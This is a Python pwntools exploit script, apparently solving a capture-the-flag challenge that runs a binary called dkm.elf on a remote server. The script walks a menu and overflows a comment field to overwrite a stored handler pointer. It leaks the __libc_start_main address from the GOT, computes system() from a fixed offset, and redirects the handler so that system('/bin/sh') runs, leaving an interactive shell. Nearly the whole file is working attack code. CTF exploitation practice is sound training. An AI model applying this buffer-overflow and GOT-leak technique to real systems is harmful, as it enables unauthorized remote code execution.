#!/usr/bin/env python
from pwn import *
# Target is a 64-bit binary; this also fixes the word size used by pack().
context.update(arch='amd64')
elf = ELF('dkm.elf')
# Address of the GOT slot for __libc_start_main.  NOTE(review): the name
# `puts` is historical and misleading -- this is NOT the GOT entry of puts().
# It is referenced later when the leak payload is built, so it is kept as-is.
puts = elf.got['__libc_start_main']
#r = remote("localhost", 5555)   # local test instance
r = remote("challs.campctf.ccc.ac", 10102)
# Consume the banner up to the first menu prompt before driving the menu.
r.recvuntil('> ')
def send_menu(r, s):
    """Answer one menu prompt on the tube and echo the next prompt.

    Args:
        r: pwntools tube (remote/process) connected to the challenge.
        s: the answer to send; a trailing newline is appended here.

    Everything received up to and including the next '> ' prompt is printed
    so the menu walk can be followed in the console.
    """
    line = s + '\n'
    r.send(line)
    reply = r.recvuntil('> ')
    print(reply)
# Menu walk recorded against the live service; each entry answers exactly one
# '> ' prompt, in order.  Apart from the "number of ssid" answer the original
# author did not document what the options mean, so the sequence is kept
# verbatim rather than being given symbolic names.
MENU_WALK = [
    '2', '1', '0', '0',
    '0',            # number of ssid
    'no comment',
    '4', '0', '2', '0', '0',
    'no comment',
    '2', '1', '0', '0', '0',
    'no comment',
    '4', '0', '3', '0', '0', '0',
]
for answer in MENU_WALK:
    send_menu(r, answer)
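libc_start_addr = 0
# Distance from __libc_start_main to system() in the REMOTE libc, i.e.
# system == __libc_start_main + SYSTEM_OFFSET (the original comment had the
# subtraction the wrong way round).  This is specific to the target's libc
# build; without a copy of that libc it has to be guessed or brute-forced, and
# a wrong value only shows up as a crash/hang in stage 2, not as an error here.
SYSTEM_OFFSET = 0x23a80
show_with_wifi = 0x4009F0  # original "show with wifi" handler inside dkm.elf

# --- stage 1: leak a libc address through the GOT ---------------------------
# The comment field overflows (0x310 bytes of filler) into the fields stored
# after it.  The show handler is left intact; the trailing pointer is aimed at
# the GOT slot of __libc_start_main so that "show" (menu option 1) prints the
# slot's contents -- a libc address -- as the SSID.
comment = 'A'*0x310
comment += pack(0)               # latitude
comment += pack(0)               # longitude
comment += pack(show_with_wifi)  # show-with-wifi handler, unchanged for now
comment += pack(0xdeadbeef)      # edit handler (placeholder, not used here)
comment += pack(puts)            # &got.__libc_start_main (variable is misnamed)
comment += pack(0)
r.send( comment + '\n' )
print(r.recvuntil('> '))
r.send('1\n')
leak = r.recvuntil('> ')
print(leak)
leak = leak.split('SSID: ')[1]
# amd64 user-space pointers fit in 6 bytes.  The binary prints the slot as a
# C string, so this assumes none of those 6 bytes is NUL -- if one is, the
# bytes after it are unrelated output and the value below is wrong.
libc_start_addr = u64(leak[:6].ljust(8, '\x00'))
# Bail out before stage 2 if the leak is obviously not a pointer (empty,
# NUL-truncated, or the prompt format changed) rather than firing a bogus
# system() address at the service.
if not 0 < libc_start_addr < (1 << 47):
    raise RuntimeError('leak does not look like a libc pointer: %r' % leak[:8])
system_addr = libc_start_addr + SYSTEM_OFFSET
print('libc_start at -{0}-'.format(hex(libc_start_addr)))
print('system at -{0}-'.format(hex(system_addr)))

# --- stage 2: redirect the show handler to system() -------------------------
# Same menu walk as the last part of stage 1 to get back to the comment prompt.
send_menu(r, '4')
send_menu(r, '0')
send_menu(r, '3')
send_menu(r, '0')
send_menu(r, '0')
send_menu(r, '0')
# Presumably the show handler is called with a pointer to the record, whose
# first field (latitude) now holds "/bin/sh", giving system("/bin/sh") when
# option 1 is selected -- inferred from the layout above, not verified here.
# The pointer field that followed `edit` in stage 1 is intentionally not
# rewritten, matching the original script.
comment = 'A'*0x310
comment += '/bin/sh\0'        # latitude -> "/bin/sh"
comment += pack(0)            # longitude
comment += pack(system_addr)  # show handler -> system()
comment += pack(0xdeadbeef)   # edit handler (placeholder)
comment += pack(0)
r.send( comment + '\n' )
print(r.recvuntil('> '))
r.send('1\n')
r.interactive()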